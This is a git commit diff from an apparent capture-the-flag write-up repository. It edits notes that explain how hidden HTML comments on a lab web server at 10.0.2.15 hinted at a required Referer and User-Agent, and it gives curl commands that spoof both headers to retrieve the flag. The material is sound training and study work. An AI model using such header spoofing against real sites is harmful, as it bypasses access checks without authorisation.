diff options
| author | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 14:14:02 +0100 |
|---|---|---|
| committer | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 14:14:02 +0100 |
| commit | b2af25fda585373931c00faa8615e931322a487b (patch) | |
| tree | c9e7ce58e85bed4c98712aafeae3fa7e18556b48 /Information leakage | |
| parent | e39d9fc7df710dc5a761d7de301da526b078cc54 (diff) | |
| download | darkly-b2af25fda585373931c00faa8615e931322a487b.tar.gz darkly-b2af25fda585373931c00faa8615e931322a487b.zip | |
Edit notes.md
Diffstat (limited to 'Information leakage')
| -rw-r--r-- | Information leakage/Resources/notes.md | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/Information leakage/Resources/notes.md b/Information leakage/Resources/notes.md index 9f13add..eaa3613 100644 --- a/Information leakage/Resources/notes.md +++ b/Information leakage/Resources/notes.md @@ -1,6 +1,6 @@ ## Exploit -1. Found a comment saying `You must come from : "https://www.nsa.gov/` +1. Found a comment saying `You must come from : "https://www.nsa.gov/` at `http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f` 1. Since one cannot edit the **Referer** header in Firefox, I used `curl --header "Referer: https://www.nsa.gov" "http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f"` 1. Found another comment in the returned page: `Let's use this browser : "ft_bornToSec". It will help you a lot.` 1. Added a `User-Agent` header `ft_bornToSec` and found the flag. Complete command: `curl --header "User-Agent: ft_bornToSec" --header "Referer: https://www.nsa.gov/" "http://10.0.2.15/index.php?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f" | grep "The flag"` |